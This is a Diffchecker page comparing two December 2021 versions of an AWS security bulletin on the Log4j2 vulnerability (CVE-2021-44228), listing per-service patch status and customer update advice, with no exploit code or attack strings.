Texte vergleichen

Finden Sie den Unterschied zwischen zwei Textdateien

Real-time diff

Unified diff

Collapse lines

Highlight change

Syntax highlighting

Onlinewerkzeuge

Diffchecker Desktop The most secure way to run Diffchecker. Get the Diffchecker Desktop app: your diffs never leave your computer!Get Desktop

v2->v3

Created 3 years agoDiff never expires

61 lines

82 lines

[V2] Last Updated Date:2021/12/13 1:42 PM PDT

[V3] Last Updated Date: 2021/12/14 2:45 PM PST

AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We are actively monitoring this issue, and are working on addressing it for any AWS services which either use Log4j2 or provide it to customers as part of their service.

AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228).

We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, or their operating system’s software update mechanism. Additional service-specific information is below.

Responding to security issues such as this one show the value of having multiple layers of defensive technologies, which is so important to maintaining the security of our customers data and workloads. We're taking this issue very seriously, and our world-class team of engineers has been working around the clock on our response and remediation. We expect to rapidly restore our full state of defense in depth.

If you need additional details or assistance, please contact AWS Support.

We continue to recommend that our customers take action to update all their applications and services by patching for known issues like this one and continue to follow our well architected guidance.

Additional service-specific information is provided below. If you need additional details or assistance, please contact AWS Support.

S3 completed patching for the Apache Log4j2 issue (CVE-2021-44228) for S3’s data ingress and egress on December 11, 2021. We have also completed patching all other S3 systems that used Log4j2.

Amazon API Gateway

Amazon OpenSearch

As of December 13, 2021, all Amazon API Gateway hosts have been patched to mitigate the Log4j issue referenced in CVE-2021-44228.

Amazon OpenSearch Service is deploying a service software update, version R20211203-P2, which contains an updated version of Log4j2. We will notify customers as the update becomes available in their regions, and update this bulletin once it is available worldwide.

Amazon CloudFront

AWS Lambda

Amazon CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.

AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issue described in CVE-2021-44228. Customers using the aws-lambda-java-log4j2 library in their functions will need to update to version 1.3.0 and redeploy.

AWS CloudHSM

CloudHSM JCE SDK versions earlier than 3.4.1 include a version of Apache Log4j affected by this issue. On December 10, 2021, CloudHSM released JCE SDK v3.4.1 with a fixed version of Apache Log4j. If you use CloudHSM JCE versions earlier than 3.4.1, you may be impacted and should mitigate the issue by upgrading CloudHSM JCE SDK to version 3.4.1 or higher.

Amazon EC2

The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228. More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.

API Gateway

We are updating API Gateway to use a version of Log4j2 that mitigates the issue. You may observe periodic latency increases for some APIs during these updates.

AWS Greengrass

Updates for all Greengrass V2 components that use Log4j are available for deployment as of 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.

The Stream Manager feature of Greengrass versions 1.10.x and 1.11.x uses Log4j. An update for the Stream Manager feature is included in Greengrass patch versions 1.10.5 and 1.11.5, which are both available as of 12/12/2021. We strongly recommend that customers on versions 1.10.x and 1.11.x who have Stream Manager enabled on their devices (or may enable it in the future) update their devices to the latest versions.

CloudFront

CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.

Text moved with changes to lines 56-60 (97.9% similarity)

Elastic BeanStalk

AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.

If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.

In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.

More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.

EMR

CVE-2021-44228 impacts Apache Log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.

We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.

Lake Formation

Lake Formation service hosts are being proactively updated to the latest version of Log4j to address the security issue with versions referenced in CVE-2021-44228.

AWS SDK

The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.

AMS

We are actively monitoring this issue, and are working on addressing it for any AMS services which use Log4j2. We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, or by using their operating system's software update mechanism.

Amazon Neptune

Amazon Neptune includes the Apache Log4j2 library as a peripheral component, but the issue is not believed to impact Neptune users. Out of an abundance of caution, Neptune clusters will be automatically updated to use a version of Log4j2 that addresses the issue. Customers may observe intermittent events during update.

Text moved to lines 80-82

NICE

Due to a CVE in the Apache Log4j library, included in EnginFrame from version 2020.0 to 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version, or update the Log4j library in your EnginFrame installation following the instructions on the support website.

Please feel free to contact us.

Kafka

Managed Streaming for Apache Kafka is aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache Zookeeper offered in MSK currently use log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use log4j > 2.0.0 library and are being patched where needed.

AWS Glue

AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.

AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed on a single tenant environment. If your ETL jobs load a specific version of Apache Log4j, then you are advised to update your scripts to use the latest version of Apache Log4j. If you use AWS Glue development endpoints to author your scripts, then you are advised to update the Log4j version you use there as well.

AWS Glue is also proactively applying the updates to new Spark environment across all supported regions. If you have questions or would like additional assistance, please contact us through AWS Support.

RDS

Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components.

Amazon Connect

Amazon Connect services have been updated to mitigate the issues identified in CVE-2021-44228.

Amazon DynamoDB

Amazon DynamoDB and Amazon DynamoDB Accelerator (DAX) have been updated to mitigate the issues identified in CVE-2021-44228.

Amazon EC2

Amazon ElastiCache

Amazon ElastiCache’s Redis engine does not include Log4j2 in its managed runtimes or base container images. Amazon ElastiCache completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.

Amazon EMR

CVE-2021-44228 impacts Apache Log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Apache Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.

AWS IoT SiteWise Edge

Updates for all AWS IoT SiteWise Edge components that use Log4j were made available for deployment on 12/13/2021. These components are: OPC-UA collector (v2.0.3), Data processing pack (v2.0.14), and Publisher (v2.0.2). AWS recommends that customers who are using these components deploy the latest versions to their SiteWise Edge gateways.

Amazon Keyspaces (for Apache Cassandra)

Amazon Keyspaces (for Apache Cassandra) has been updated to mitigate the issues identified in CVE-2021-44228.

Amazon Kinesis Data Analytics

The versions of Apache Flink supported by Amazon Kinesis Data Analytics include Apache Log4j versions between 2.0 and 2.14.1. Kinesis Data Analytics applications operate in single-tenant, isolated environments and cannot interact with one another.

We are updating the version of Log4j available to Kinesis Data Analytics customer applications in all AWS regions. Applications started or updated after 6:30 PM PST on 12/12/2021 will automatically receive the updated patch. Customers whose applications were started or updated before then can ensure that their applications run on the updated version of Log4j by calling the Kinesis Data Analytics UpdateApplication API. More information about the UpdateApplication API is available within the service’s documentation.

Amazon Kinesis Data Streams

We are actively patching all sub-systems that use Log4j2 by applying updates. The Kinesis Client Library (KCL) version 2.X and the Kinesis Producer Library (KPL) are not impacted. For customers using KCL 1.x, we have released an updated version and we strongly recommend that all KCL version 1.x customers upgrade to KCL version 1.14.5 (or higher) which is available here.

Amazon Managed Streaming for Apache Kafka (MSK)

We are aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache Zookeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use Log4j > 2.0.0 library and are being patched where needed.

Amazon Managed Workflows for Apache Airflow (MWAA)

MWAA has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MWAA service code (AWS specific) and open source code (Apache Airflow).

As of Dec 14, 2021, we have completed all required updates to the MWAA service code to address the issue. Apache Airflow does not use Log4j2 and is not affected by this issue.

We strongly encourage customers who have added Log4j2 to their environments to update to the latest version.

Amazon MemoryDB for Redis

Amazon MemoryDB for Redis completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.

Amazon MQ

Amazon MQ has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MQ service code (AWS specific) and open source code (Apache ActiveMQ and RabbitMQ message brokers).

As of Dec 13, 2021, we have completed all required updates to the Amazon MQ service code to address the issue.

There are no updates required to the open source message brokers. All versions of Apache ActiveMQ offered in Amazon MQ use Log4j version 1.2.x, which is not affected by this issue. RabbitMQ does not use Log4j and is not affected by this issue.

Kinesis Data Analytics

Amazon Neptune

The versions of Apache Flink supported by Kinesis Data Analytics include Apache Log4j versions between 2.0 and 2.14.1. Kinesis Data Analytics applications operate in single-tenant, isolated environments and cannot interact with one another.

All active Amazon Neptune clusters have been automatically updated to mitigate the issues identified in CVE-2021-44228.

We are updating the version of Log4j available to Kinesis Data Analytics customer applications in all AWS regions. Applications started or updated after 6:30 PM PST on 12/12/2021 will automatically receive the updated patch. Customers whose applications were started or updated before then can ensure that their applications run on the updated version of Log4j by calling the Kinesis Data Analytics UpdateApplication API. Please see more information about the UpdateApplication API.

Amazon OpenSearch Service

Amazon OpenSearch Service has released a critical service software update, R20211203-P2, that contains an updated version of Log4j2 in all regions. We strongly recommend that customers update their OpenSearch clusters to this release as soon as possible.

Amazon RDS

Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j2 library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components.

Amazon S3

Amazon S3 completed patching for the Apache Log4j2 issue (CVE-2021-44228) for S3’s data ingress and egress on December 11, 2021. We have also completed patching all other S3 systems that used Log4j2.

Amazon Simple Notification Service (SNS)

Amazon SNS systems that serve customer traffic are patched against the Log4j2 issue. We are working to apply the Log4j2 patch to sub-systems that operate separately from SNS’s systems that serve customer traffic.

Amazon Simple Workflow Service (SWF)

Amazon Simple Workflow Service (SWF) has been updated to mitigate the issues identified in CVE-2021-44228.

AWS CloudHSM

AWS CloudHSM JCE SDK versions earlier than 3.4.1 include a version of Apache Log4j affected by this issue. On December 10, 2021, CloudHSM released JCE SDK v3.4.1 with a fixed version of Apache Log4j. If you use CloudHSM JCE versions earlier than 3.4.1, you may be impacted and should mitigate the issue by upgrading the CloudHSM JCE SDK to version 3.4.1 or higher.

Text moved with changes from lines 22-26 (97.9% similarity)

AWS Elastic Beanstalk

If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.

More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.

AWS Glue

AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed on a single tenant environment. If you have uploaded a custom jar file for use in your ETL jobs or Development Endpoints which includes a specific version of Apache Log4j, then you are advised to update your jar to use the latest version of Apache Log4j.

AWS Glue is also proactively applying the updates to new Spark environments across all supported regions. If you have questions or would like additional assistance, please contact AWS Support.

AWS Greengrass

Updates for all AWS Greengrass V2 components that use Log4j are available for deployment as of 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.

AWS Lake Formation

AWS Lake Formation service hosts are being updated to the latest version of Log4j to address the issue with versions referenced in CVE-2021-44228.

AWS Lambda

AWS SDK

The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on Log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.

AWS Step Functions

AWS Step Functions has been updated to mitigate the issues identified in CVE-2021-44228.

AWS Web Application Firewall (WAF)

To improve detection and mitigation relating to the recent Log4j security issue, customers of CloudFront, Application Load Balancer (ALB), API Gateway, and AppSync can optionally enable AWS WAF and apply two AWS Managed Rules (AMR): AWSManagedRulesKnownBadInputsRuleSet and AWSManagedRulesAnonymousIpList.

AWSManagedRulesKnownBadInputsRuleSet inspects request uri, body, and commonly used headers, while AWSManagedRulesAnonymousIpList helps block requests from services that allow the obfuscation of viewer identity. You can apply these rules by creating an AWS WAF web ACL, adding one or both rulesets to your web ACL, and then associating the web ACL with your CloudFront distribution, ALB, API Gateway or AppSync GraphQL APIs.

We continue to iterate the AWSManagedRulesKnownBadInputsRuleSet Rule Group as we learn more. To receive automatic updates to the AWSManagedRulesKnownBadInputsRuleSet, please choose the default version. For customers using AWS WAF Classic, you will need to migrate to AWS WAF or create custom regex match conditions. Customers can use AWS Firewall Manager which enables you to configure AWS WAF rules across multiple AWS accounts and resources from a single place. You can group rules, build policies, and centrally apply those policies across your entire infrastructure.

Text moved from lines 38-40

NICE

Please feel free to contact us.

Gespeicherten Diffs

Original text

Datei öffnen

[V2] Last Updated Date:2021/12/13 1:42 PM PDT
AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We are actively monitoring this issue, and are working on addressing it for any AWS services which either use Log4j2 or provide it to customers as part of their service.
We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, or their operating system’s software update mechanism. Additional service-specific information is below.
If you need additional details or assistance, please contact AWS Support.
S3
S3 completed patching for the Apache Log4j2 issue (CVE-2021-44228) for S3’s data ingress and egress on December 11, 2021. We have also completed patching all other S3 systems that used Log4j2.
Amazon OpenSearch
Amazon OpenSearch Service is deploying a service software update, version R20211203-P2, which contains an updated version of Log4j2. We will notify customers as the update becomes available in their regions, and update this bulletin once it is available worldwide.
AWS Lambda
AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issue described in CVE-2021-44228. Customers using the aws-lambda-java-log4j2 library in their functions will need to update to version 1.3.0 and redeploy.
AWS CloudHSM
CloudHSM JCE SDK versions earlier than 3.4.1 include a version of Apache Log4j affected by this issue. On December 10, 2021, CloudHSM released JCE SDK v3.4.1 with a fixed version of Apache Log4j. If you use CloudHSM JCE versions earlier than 3.4.1, you may be impacted and should mitigate the issue by upgrading CloudHSM JCE SDK to version 3.4.1 or higher.
Amazon EC2
The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228. More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
API Gateway
We are updating API Gateway to use a version of Log4j2 that mitigates the issue. You may observe periodic latency increases for some APIs during these updates.
AWS Greengrass
Updates for all Greengrass V2 components that use Log4j are available for deployment as of 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.
The Stream Manager feature of Greengrass versions 1.10.x and 1.11.x uses Log4j. An update for the Stream Manager feature is included in Greengrass patch versions 1.10.5 and 1.11.5, which are both available as of 12/12/2021. We strongly recommend that customers on versions 1.10.x and 1.11.x who have Stream Manager enabled on their devices (or may enable it in the future) update their devices to the latest versions.
CloudFront
CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.
Elastic BeanStalk
AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.
If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.
In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.
More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
EMR
CVE-2021-44228 impacts Apache Log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.
We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.
Lake Formation
Lake Formation service hosts are being proactively updated to the latest version of Log4j to address the security issue with versions referenced in CVE-2021-44228.
AWS SDK
The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.
AMS
We are actively monitoring this issue, and are working on addressing it for any AMS services which use Log4j2. We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, or by using their operating system's software update mechanism.
Amazon Neptune
Amazon Neptune includes the Apache Log4j2 library as a peripheral component, but the issue is not believed to impact Neptune users. Out of an abundance of caution, Neptune clusters will be automatically updated to use a version of Log4j2 that addresses the issue. Customers may observe intermittent events during update.
NICE
Due to a CVE in the Apache Log4j library, included in EnginFrame from version 2020.0 to 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version, or update the Log4j library in your EnginFrame installation following the instructions on the support website.
Please feel free to contact us.
Kafka
Managed Streaming for Apache Kafka is aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache Zookeeper offered in MSK currently use log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use log4j > 2.0.0 library and are being patched where needed.
AWS Glue
AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.
AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed on a single tenant environment. If your ETL jobs load a specific version of Apache Log4j, then you are advised to update your scripts to use the latest version of Apache Log4j. If you use AWS Glue development endpoints to author your scripts, then you are advised to update the Log4j version you use there as well.
AWS Glue is also proactively applying the updates to new Spark environment across all supported regions. If you have questions or would like additional assistance, please contact us through AWS Support.
RDS
Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components.
Amazon Connect
Amazon Connect services have been updated to mitigate the issues identified in CVE-2021-44228.
Amazon DynamoDB
Amazon DynamoDB and Amazon DynamoDB Accelerator (DAX) have been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Keyspaces (for Apache Cassandra)
Amazon Keyspaces (for Apache Cassandra) has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon MQ
Amazon MQ has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MQ service code (AWS specific) and open source code (Apache ActiveMQ and RabbitMQ message brokers).
As of Dec 13, 2021, we have completed all required updates to the Amazon MQ service code to address the issue.
There are no updates required to the open source message brokers. All versions of Apache ActiveMQ offered in Amazon MQ use Log4j version 1.2.x, which is not affected by this issue. RabbitMQ does not use Log4j and is not affected by this issue.
Kinesis Data Analytics
The versions of Apache Flink supported by Kinesis Data Analytics include Apache Log4j versions between 2.0 and 2.14.1. Kinesis Data Analytics applications operate in single-tenant, isolated environments and cannot interact with one another.
We are updating the version of Log4j available to Kinesis Data Analytics customer applications in all AWS regions. Applications started or updated after 6:30 PM PST on 12/12/2021 will automatically receive the updated patch. Customers whose applications were started or updated before then can ensure that their applications run on the updated version of Log4j by calling the Kinesis Data Analytics UpdateApplication API. Please see more information about the UpdateApplication API.

Geänderter text

Datei öffnen

[V3] Last Updated Date: 2021/12/14 2:45 PM PST
AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228).
Responding to security issues such as this one show the value of having multiple layers of defensive technologies, which is so important to maintaining the security of our customers data and workloads. We're taking this issue very seriously, and our world-class team of engineers has been working around the clock on our response and remediation. We expect to rapidly restore our full state of defense in depth.
We continue to recommend that our customers take action to update all their applications and services by patching for known issues like this one and continue to follow our well architected guidance.
Additional service-specific information is provided below. If you need additional details or assistance, please contact AWS Support.
Amazon API Gateway
As of December 13, 2021, all Amazon API Gateway hosts have been patched to mitigate the Log4j issue referenced in CVE-2021-44228.
Amazon CloudFront
Amazon CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.
Amazon Connect
Amazon Connect services have been updated to mitigate the issues identified in CVE-2021-44228.
Amazon DynamoDB
Amazon DynamoDB and Amazon DynamoDB Accelerator (DAX) have been updated to mitigate the issues identified in CVE-2021-44228.
Amazon EC2
The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228. More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
Amazon ElastiCache
Amazon ElastiCache’s Redis engine does not include Log4j2 in its managed runtimes or base container images. Amazon ElastiCache completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.
Amazon EMR
CVE-2021-44228 impacts Apache Log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Apache Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.
We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.
AWS IoT SiteWise Edge
Updates for all AWS IoT SiteWise Edge components that use Log4j were made available for deployment on 12/13/2021. These components are: OPC-UA collector (v2.0.3), Data processing pack (v2.0.14), and Publisher (v2.0.2). AWS recommends that customers who are using these components deploy the latest versions to their SiteWise Edge gateways.
Amazon Keyspaces (for Apache Cassandra)
Amazon Keyspaces (for Apache Cassandra) has been updated to mitigate the issues identified in CVE-2021-44228.
Amazon Kinesis Data Analytics
The versions of Apache Flink supported by Amazon Kinesis Data Analytics include Apache Log4j versions between 2.0 and 2.14.1. Kinesis Data Analytics applications operate in single-tenant, isolated environments and cannot interact with one another.
We are updating the version of Log4j available to Kinesis Data Analytics customer applications in all AWS regions. Applications started or updated after 6:30 PM PST on 12/12/2021 will automatically receive the updated patch. Customers whose applications were started or updated before then can ensure that their applications run on the updated version of Log4j by calling the Kinesis Data Analytics UpdateApplication API. More information about the UpdateApplication API is available within the service’s documentation.
Amazon Kinesis Data Streams
We are actively patching all sub-systems that use Log4j2 by applying updates. The Kinesis Client Library (KCL) version 2.X and the Kinesis Producer Library (KPL) are not impacted. For customers using KCL 1.x, we have released an updated version and we strongly recommend that all KCL version 1.x customers upgrade to KCL version 1.14.5 (or higher) which is available here.
Amazon Managed Streaming for Apache Kafka (MSK)
We are aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache Zookeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use Log4j > 2.0.0 library and are being patched where needed.
Amazon Managed Workflows for Apache Airflow (MWAA)
MWAA has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MWAA service code (AWS specific) and open source code (Apache Airflow).
As of Dec 14, 2021, we have completed all required updates to the MWAA service code to address the issue. Apache Airflow does not use Log4j2 and is not affected by this issue.
We strongly encourage customers who have added Log4j2 to their environments to update to the latest version.
Amazon MemoryDB for Redis
Amazon MemoryDB for Redis completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.
Amazon MQ
Amazon MQ has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MQ service code (AWS specific) and open source code (Apache ActiveMQ and RabbitMQ message brokers).
As of Dec 13, 2021, we have completed all required updates to the Amazon MQ service code to address the issue.
There are no updates required to the open source message brokers. All versions of Apache ActiveMQ offered in Amazon MQ use Log4j version 1.2.x, which is not affected by this issue. RabbitMQ does not use Log4j and is not affected by this issue.
Amazon Neptune
All active Amazon Neptune clusters have been automatically updated to mitigate the issues identified in CVE-2021-44228.
Amazon OpenSearch Service
Amazon OpenSearch Service has released a critical service software update, R20211203-P2, that contains an updated version of Log4j2 in all regions. We strongly recommend that customers update their OpenSearch clusters to this release as soon as possible.
Amazon RDS
Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j2 library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components.
Amazon S3
Amazon S3 completed patching for the Apache Log4j2 issue (CVE-2021-44228) for S3’s data ingress and egress on December 11, 2021. We have also completed patching all other S3 systems that used Log4j2.
Amazon Simple Notification Service (SNS)
Amazon SNS systems that serve customer traffic are patched against the Log4j2 issue. We are working to apply the Log4j2 patch to sub-systems that operate separately from SNS’s systems that serve customer traffic.
Amazon Simple Workflow Service (SWF)
Amazon Simple Workflow Service (SWF) has been updated to mitigate the issues identified in CVE-2021-44228.
AWS CloudHSM
AWS CloudHSM JCE SDK versions earlier than 3.4.1 include a version of Apache Log4j affected by this issue. On December 10, 2021, CloudHSM released JCE SDK v3.4.1 with a fixed version of Apache Log4j. If you use CloudHSM JCE versions earlier than 3.4.1, you may be impacted and should mitigate the issue by upgrading the CloudHSM JCE SDK to version 3.4.1 or higher.
AWS Elastic Beanstalk
AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.
If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.
In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.
More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
AWS Glue
AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.
AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed on a single tenant environment. If you have uploaded a custom jar file for use in your ETL jobs or Development Endpoints which includes a specific version of Apache Log4j, then you are advised to update your jar to use the latest version of Apache Log4j.
AWS Glue is also proactively applying the updates to new Spark environments across all supported regions. If you have questions or would like additional assistance, please contact AWS Support.
AWS Greengrass
Updates for all AWS Greengrass V2 components that use Log4j are available for deployment as of 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.
The Stream Manager feature of Greengrass versions 1.10.x and 1.11.x uses Log4j. An update for the Stream Manager feature is included in Greengrass patch versions 1.10.5 and 1.11.5, which are both available as of 12/12/2021. We strongly recommend that customers on versions 1.10.x and 1.11.x who have Stream Manager enabled on their devices (or may enable it in the future) update their devices to the latest versions.
AWS Lake Formation
AWS Lake Formation service hosts are being updated to the latest version of Log4j to address the issue with versions referenced in CVE-2021-44228.
AWS Lambda
AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issue described in CVE-2021-44228. Customers using the aws-lambda-java-log4j2 library in their functions will need to update to version 1.3.0 and redeploy.
AWS SDK
The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on Log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.
AWS Step Functions
AWS Step Functions has been updated to mitigate the issues identified in CVE-2021-44228.
AWS Web Application Firewall (WAF)
To improve detection and mitigation relating to the recent Log4j security issue, customers of CloudFront, Application Load Balancer (ALB), API Gateway, and AppSync can optionally enable AWS WAF and apply two AWS Managed Rules (AMR): AWSManagedRulesKnownBadInputsRuleSet and AWSManagedRulesAnonymousIpList.
AWSManagedRulesKnownBadInputsRuleSet inspects request uri, body, and commonly used headers, while AWSManagedRulesAnonymousIpList helps block requests from services that allow the obfuscation of viewer identity. You can apply these rules by creating an AWS WAF web ACL, adding one or both rulesets to your web ACL, and then associating the web ACL with your CloudFront distribution, ALB, API Gateway or AppSync GraphQL APIs.
We continue to iterate the AWSManagedRulesKnownBadInputsRuleSet Rule Group as we learn more. To receive automatic updates to the AWSManagedRulesKnownBadInputsRuleSet, please choose the default version. For customers using AWS WAF Classic, you will need to migrate to AWS WAF or create custom regex match conditions. Customers can use AWS Firewall Manager which enables you to configure AWS WAF rules across multiple AWS accounts and resources from a single place. You can group rules, build policies, and centrally apply those policies across your entire infrastructure.
NICE
Due to a CVE in the Apache Log4j library, included in EnginFrame from version 2020.0 to 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version, or update the Log4j library in your EnginFrame installation following the instructions on the support website.
Please feel free to contact us.

Words removed	1231
Total words	1454
Words removed (%)	84.66

Words added	1717
Total words	1940
